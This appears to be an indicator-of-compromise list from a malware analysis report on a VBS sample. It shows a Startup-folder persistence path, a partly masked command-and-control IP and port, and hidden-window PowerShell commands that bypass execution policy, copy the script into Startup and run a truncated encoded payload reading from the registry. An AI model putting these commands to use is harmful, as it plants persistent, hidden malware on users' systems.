Technical Information
- %APPDATA%\microsoft\windows\start menu\programs\startup\pp021_is_best.vbs
- '43.##8.86.211':5555
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -exec bypass -window 1 Copy-Item '<PATH_SAMPLE>.vbs' '%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\pp021_is_best.vbs';' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit -exec bypass -window 1 -enc IAAkAHQAZQB4AHQAIAA9ACAAKAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIABIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABwAHAAMAAyADEAXwBpAHMAXwBiAGUAcwB0AFwAKQAuA...' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -exec bypass -window 1 Copy-Item '<PATH_SAMPLE>.vbs' '%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\pp021_is_best.vbs';
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit -exec bypass -window 1 -enc IAAkAHQAZQB4AHQAIAA9ACAAKAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIABIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABwAHAAMAAyADEAXwBpAHMAXwBiAGUAcwB0AFwAKQAuA...